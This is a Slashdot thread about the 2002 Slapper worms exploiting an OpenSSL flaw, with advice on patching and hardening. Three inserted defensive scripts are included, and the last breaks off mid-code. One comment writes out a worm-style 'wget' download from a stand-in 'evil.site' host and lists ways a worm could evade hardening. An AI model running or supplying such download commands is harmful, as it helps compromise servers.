Posted by CmdrTaco on from the random-dune-reference-here dept.
randomErr writes "The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.;)
It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
-- Analytic & algebraic topology of locally Euclidean metrization of infinitely differentiable Riemannian manifold
Re:A few hopes... by larien · Score: 5, Informative
The patches have been out for over a month, I'm pretty sure of that. I downloaded the patches as soon as Debian had the new ones online.
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
The bug was patched 2 months ago so I guess that is the case:>
Re:A few hopes... by Anonymous Coward · Score: 2, Interesting
Whoever is writing these worms knows how much damage they're doing to open source.
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea! Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
> It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Pfff.. it would also be better if people informed microsoft of _every_ exploit before releasing virii in the wild:)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to /. a few weeks ago.
Problem is, it's a similar scenario to how Windows admins get burnt - it's just that there's usually a shorter interval between patch-exploit in the Windows admin world.
Any admin of either platform who uses best practices should be safe from most exploits. Shut down unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Whoever is writing these worms knows how much damage they're doing to open source. Maybe these worms come from Microsoft themselves ?
Re:A few hopes... by BESTouff · Score: 2, Insightful
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:A few hopes... by AndrewHowe · Score: 3, Insightful
If Open Source claims that it is somehow better at dealing with this sort of thing, and it turns out that it isn't, then it deserves the "damage" you speak of. Why should Open Source be immune from criticism? Live by the sword, die by the sword.
Re:A few hopes... by pythorlh · Score: 2, Insightful
The main difference that Microsoft encourages the development of clueless admins. The MCxx certifications are geared to producing admins that can pass a test, not admins who can effectively administrate. Yes, there exist lame Linux certs, too, and yes, we do have clueless Linux admins. But the whole community of Linux is based on educating the user, admin or not, about how to properly configure the system. Thus, a vastly smaller percentage of Linux admins end up clueless, and the ones that do really deserve what they get. MCxx admins often have the mistaken impression that they already know enough to do their job. Linux admins generally know what they don't know, and know who to go to to ask.
-- Do not confuse duty with what other people expect of you; they are utterly different. Duty is a debt you owe to yourself.
Yeah, the admins should have patched this up. Wanna know the funniest? Check this article where a security writer got hit with Slapper. It shows even those who should know better sometimes get hit.
> It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you.
Exactly. Lots of organizations have security groups that do this sort of thing. "We're going to be testing everyone's security by staging several kinds of breakins. Our operatives will be carrying proper ID, which they will show you if you manage to apprehend them. But we won't tell you the time or place of our attack..."
There is a history of security firms doing this sort of thing, with the full knowledge of their customers' top management. There is also a history of accounting departments inserting dummy data as a test of the auditors. If the auditors don't find it, they flunk.
Any organization NOT doing this sort of test of their security is vulnerable.
-- Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Re:A few hopes... by n9hmg · Score: 3, Insightful
explain RTFM? While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people write documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioner's name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English (technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduced with something like "I could explain in my own words, but I think the author of the man page did a better job than I could." Here on /., people are often more terse, and when somebody says or asks something ignorant (or maybe just plain stupid), responders can get pretty rude. In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... by evilpenguin · Score: 5, Insightful
And any organization doing this sort of test is STILL vulnerable. That's the problem with trying to prove a negative. Just because an intrusion failed this time does not mean that it will next time. Now, I'm not arguing against performing the kind of assessment and audit you are talking about here, but such tests are only part of the process.
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on closed or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, because system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue is so critical that it should short-circuit regression testing is a difficult art. And what if the production systems don't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
You think this is tied to the popularity increase of Linux in the userbase?
Yes, just like in the case with Windows.
-- Beware: In C++, your friends can see your privates!
use chkrootkit to see if you've gotten it by motorsabbath · Score: 5, Informative
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
-- The heat from below can burn your eyes out
Re:use chkrootkit to see if you've gotten it by RudeDude · Score: 2, Informative
FYI The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37: edf50a9c8c6bf09b0a9147f2e6168826 BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order.:)
-- RudeDude
Perl/Linux/PHP hacker
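The post above describes mirrors serving a 0.37 tarball with a digest that actually belongs to 0.35, and the writer's unease about running an unverified archive as root. The natural control is to compare the digest against the one the project publishes before unpacking or executing anything. The script below is an added example, not code from the thread or from the chkrootkit project; the file contents and the "published" digest it uses are constructed for the demo, and the function names (`md5_of`, `verify_md5`) are my own.

```shell
#!/bin/sh
# Added example (not from the thread or the chkrootkit project): refuse to unpack or
# run a downloaded tarball unless its MD5 matches the digest the project published.
# Everything below the function definitions is a constructed demo.

# md5_of FILE: print the lowercase hex MD5 of FILE; uses md5sum (coreutils) and
# falls back to openssl where md5sum is absent.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    else
        openssl dgst -md5 "$1" | awk '{print $NF}'
    fi
}

# verify_md5 FILE EXPECTED: return 0 when FILE's MD5 equals EXPECTED (compared
# case-insensitively), 1 otherwise. Prints a one-line verdict so an install script
# can log it; the exit status is what the caller should branch on.
verify_md5() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    actual=$(md5_of "$file")
    if [ "$actual" = "$expected" ]; then
        echo "OK   $file $actual"
        return 0
    fi
    echo "FAIL $file expected=$expected actual=$actual" >&2
    return 1
}

# Constructed demo: a fake tarball whose digest we treat as the "published" value,
# plus a copy that a stale or tampered mirror might serve.
demo_dir=$(mktemp -d)
printf 'chkrootkit demo payload\n' > "$demo_dir/chkrootkit-0.37.tar.gz"
published=$(md5_of "$demo_dir/chkrootkit-0.37.tar.gz")
cp "$demo_dir/chkrootkit-0.37.tar.gz" "$demo_dir/mirror-copy.tar.gz"
printf 'one extra byte' >> "$demo_dir/mirror-copy.tar.gz"

# Only proceed (here: just announce) when the check passes; the altered copy is rejected.
if verify_md5 "$demo_dir/chkrootkit-0.37.tar.gz" "$published"; then
    echo "digest matches: safe to unpack $demo_dir/chkrootkit-0.37.tar.gz"
fi
verify_md5 "$demo_dir/mirror-copy.tar.gz" "$published" || echo "rejected tampered copy"
```

In a real install script the `published` value would come from the project's announcement or signed release notes rather than from the same mirror that served the tarball, since a mirror that can alter the archive can alter a checksum file sitting beside it just as easily.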
Re:use chkrootkit to see if you've gotten it by friedmud · Score: 2
As a side note - you should know that if you were using Gentoo linux all you have to do is:
emerge chkrootkit
And it will get the source, check the md5, compile, and install it for you.
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
No. This is purely an openssl problem. It was patched in July! The "blame" goes with those who don't apply security patches marked as critical. The worm could as easily have been written to attack users of unpatched installations of stunnel-win32, but that wouldn't be nearly as satisfying for a worm-writer as something that can attack apache on linux.
This is the sort of thing that makes open source (and linux) look amateurish, unprofessional, and insecure.
I wonder how Windows must look then. Yikes!
-- -- Jim
Same mantra applies to Linux and MS sysadmins: by bittmann · Score: 5, Informative
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins: by petard · Score: 5, Informative
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
If you must use a compiler on your web server, FFS run the publicly accessible service in a chroot jail!
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins: by rmadmin · Score: 2
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install);
Or in Solaris sysadmin speak, or in redhat sysadmin speak. For instance, solaris tends to run NFS stuffs by default. And Redhat (probably a few other distros too), tend to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins: by mjh · Score: 2
2) Keep up to date on your patch levels.
Thank you, debian, for apt. Here's how I keep up to date with patches:
apt-get update && apt-get -u upgrade
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start a distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins: by mrseth · Score: 2
I know. I do the same thing on my RedHat boxes with this.
Re:Same mantra applies to Linux and MS sysadmins: by AftanGustur · Score: 2
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitate to do a "chkconfig --del [service]". It's not really deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that you caused yourself than fixing something that was done by an intruder.
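Both bittmann's point 1) above (and the question of how many infected sites had port 443 "hot but unused") and the `chkconfig --list` advice in this post come down to the same audit: find out what is actually listening and compare it with what the box is supposed to serve. The script below is an added example, not code from the thread; it reads the kernel's socket table directly from `/proc/net/tcp` so it still works on a stripped-down server that has no netstat or ss, and the socket table it parses here is a constructed sample rather than a live capture. The function names (`listening_ports`, `unexpected_ports`) are my own.

```shell
#!/bin/sh
# Added example (not from the thread): list TCP ports in LISTEN state straight from
# /proc/net/tcp, then flag any that are not on an allowlist of expected services.
# The socket table used for the demo is constructed; on a live Linux host pass
# /proc/net/tcp and /proc/net/tcp6 instead.

# listening_ports FILE...: print one decimal port per line, sorted and de-duplicated,
# for every socket whose state column (field 4) is 0A, the kernel's code for LISTEN.
# The local port is the hex value after the colon in field 2; POSIX awk has no
# strtonum, so the hex is converted by hand.
listening_ports() {
    awk 'FNR == 1 { next }                      # column header of each file
         $4 == "0A" {
             split($2, addr, ":")
             hex = toupper(addr[2]); port = 0
             for (i = 1; i <= length(hex); i++)
                 port = port * 16 + index("0123456789ABCDEF", substr(hex, i, 1)) - 1
             print port
         }' "$@" | sort -n | uniq
}

# unexpected_ports "ALLOWED PORTS" FILE...: print every listening port that is not
# in the space-separated allowlist; an empty result means nothing unexpected is open.
unexpected_ports() {
    allowed=" $1 "
    shift
    for p in $(listening_ports "$@"); do
        case "$allowed" in
            *" $p "*) ;;
            *) echo "$p" ;;
        esac
    done
}

# Constructed sample in /proc/net/tcp layout: sshd (0016 = 22), httpd (0050 = 80),
# an https listener (01BB = 443), smtp on loopback (0019 = 25), and one ESTABLISHED
# client connection (state 01) that must not be reported.
sample=$(mktemp)
cat > "$sample" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 100 0 0 10 0
   2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1236 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1237 1 0000000000000000 100 0 0 10 0
   4: 0100007F:C350 0100007F:0050 01 00000000:00000000 00:00000000 00000000  1000        0 1238 1 0000000000000000 20 4 30 10 -1
EOF

echo "listening ports:"
listening_ports "$sample"
echo "listening but not in the allowlist (22 80):"
unexpected_ports "22 80" "$sample"
```

With an allowlist of just ssh and plain http, the sample reports 25 and 443: the mail listener nobody remembered and exactly the "hot but unused" SSL port bittmann wondered about. Each flagged port is then a `chkconfig --del` (or a firewall rule) decision rather than a surprise.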
Re:Same mantra applies to Linux and MS sysadmins: by slamb · Score: 5, Insightful
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins: by petard · Score: 5, Insightful
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
Prevent compromise. This is done by disabling unnecessary services and keeping your patch levels current, among other things.
Reduce the impact of compromises that do occur. One way to do this is, much as you disable unnecessary services, only keep the software needed for your application on the box.
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
-- .sig: file not found
Re:Same mantra applies to Linux and MS sysadmins: by HiThere · Score: 2
A nicer answer is to move the compiler to another folder and make it unfindable from the system path, and then add it to the path of selected users. I suppose you could also read protect it, but if the virus has root, that wouldn't help, and if it doesn't, then the damage it could do is minimal. (Perhaps the script to add gcc to the path should need to be manually executed? Perhaps it should not be added, but need to be specified? /usr/bin/gcc/gcc...?) Any particular solution is possible for the virus to work around, but diverse solutions would really limit the possibilities for that. (Well, not installing gcc at all is difficult to work around, but it would also make installing software a bit difficult.)
--
I think we've pushed this "anyone can grow up to be president" thing too far.
Re:Same mantra applies to Linux and MS sysadmins: by mjh · Score: 2
Yeah I've set up a RH box doing this, too. It's nice, but it's not the same. I think the problem is that there simply aren't enough people contributing to the RPM repositories. Basically it's just Red Hat. Which is pretty good, but it's not the same as debian.
Because RH has to maintain so many packages, more or less, all by themselves, the workload on each package maintainer is pretty high. And they're not able to keep up with patches as well as debian. Security patches are kept about equally. But other non-security related patches don't seem to get into the red hat repositories as quickly as they get into debian.
But that's just my $.02 after having tried apt-rpm for a month or so. That may not have been long enough to get a very good feel for it.
-- Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
Re:Same mantra applies to Linux and MS sysadmins: by slamb · Score: 2
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
I'd have to say that removing arbitrary bits of your toolchain because some worm uses them is an ivory tower idea. It makes assumptions of a perfect system (you have a staging machine that has identical library versions, etc). When those are not true, it doesn't work out well - the version you've meticulously tested elsewhere fails in a way it wouldn't if you had compiled it locally. And the time spent doing it could be better spent running rhn_register or similar for much more real gain.
To give further examples, I expect people to say several of the following in the future:
don't have a compiler on your production machine (again. worm workaround: download compiled code)
don't have wget on your production machine. (worm workaround: use curl, links, lynx, ftp, ncftp, scp, sftp, or just implement the transfer itself; it doesn't require much code.)
add a fake /etc/hosts entry for evil.site (work by IP address, change the site name)
deny outbound connections from the webserver (this one actually would stop your machine from infecting other servers unless the attacker gets privileges necessary to change the firewall rules, but it would be really annoying)
remove /bin/uname (use /usr/bin/file to find the binary type of a standard system binary)
remove /usr/bin/file (some other trick to find system type; there are plenty)
run the webserver in a jail on a machine that is uncrippled. (Now this one actually makes sense, though it may not realistically be worth the effort.)
At some point, you've made things much more difficult for yourself and lost all perspective on a non-problem. These worms have all happened well after the patches are available.
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Yes, two or three minor worms in an optional component of an open source server are certainly as big a deal as the literally thousands of virii/security holes/etc in the fundamental core of Windows. The several thousand servers that have been infected with Slapper.b/c certainly compare in scope to the hundreds of thousands, if not millions, affected by Code Red/Nimda/I Love You/etc.
Re:The Worm by chrysrobyn · Score: 5, Insightful
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
'Do you know how much you're hurting the open-source movement? Please stop.'
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
What I find terribly amusing is your lack of knowledge. Patch is more than one month old.
This virus is not hurting the Linux community. It just shows that there's too few holes for virus writers to be original. The last 3 viruses were using the same one hole. That's more promoting than demoting.
Well, for bad admins. I feel it's ok if they get infected. And for users, they don't have a web server, but if they have, they should click the Update icon sometimes.
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
--
My beliefs do not require that you agree with them.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones.
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah" crowd (/huge generalisation).
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
Also, come the 2.6 kernel, and pluggable security modules, installing stack protectors and tiered security models will be more commonplace and a lot of the stupid holes that have allowed these attacks will simply go away.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Open any folder window. Tools menu, folder options, view tab, the last option in the advanced box ("Simple file sharing") - uncheck that. You'll get your real sharing and permissions tabs back.
My statement: Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate: I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Yeah! I've been waiting for that one for years! Connecting to the internet just *shouldn't* require access to root!
--
I think we've pushed this "anyone can grow up to be president" thing too far.
A missed chance for some bad humor
by
shren
·
· Score: 2, Redundant
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
-- Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
A spacious analogy.
by
Lethyos
·
· Score: 2, Insightful
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
-- Why bother.
what does it look like?
by
Anonymous Coward
·
· Score: 5, Interesting
What should I look for in my apache logs to see if I'm being "hit" by it? Anyone have an example?
your friendly neighborhood AC
Re:what does it look like?
by
EkiM+in+De
·
· Score: 2, Informative
Well I'm not entirely sure, but I found in my error_log a couple of bad hits from other Apache servers. I found the Apache Test page on these servers, which I suspect is a bit of a giveaway that perhaps these are not active servers. Anyway I could be completely wrong, but since these hits were from web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
You'll only get that file if you're vulnerable. If you're up to date on patches, you won't see anything in /tmp (other than files that should be there).
Re:what does it look like?
by
KMitchell
·
· Score: 5, Informative
You'll get some additional stuff in your access log and potentially error log but the telltale sign that (on a patched system) someone is pinging you for the exploit is something like this in your ssl_error_log:
Yeah, in my logs that stuff is from the same IPs that there's then the buffer overflow attempt from. Unfortunately, those spurious handshakes also create a short-term DOS situation - they keep Apache awfully busy. Has anyone come up with a way to block the spurious attempts with, say, iptables, while keeping legitimate 443 service open?
-- "with their freedom lost all virtue lose" - Milton
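The two questions above (what a probe looks like in the logs, and how to shut out the repeat offenders without closing port 443) can be answered with a small log triage script. The following is an added example, not code from any poster: it parses Apache 1.3 error_log lines in the format quoted elsewhere in this thread, counts the "request without hostname" message per client, flags clients that repeat it within a short window (a single such line is also produced by harmless broken clients, hence the threshold), and renders per-source iptables DROP rules for port 443 only. The sample log lines are constructed; the 192.0.2.x addresses are documentation placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache 1.3 error_log layout, e.g. the entry quoted in this thread:
# [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname ...
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$"
)

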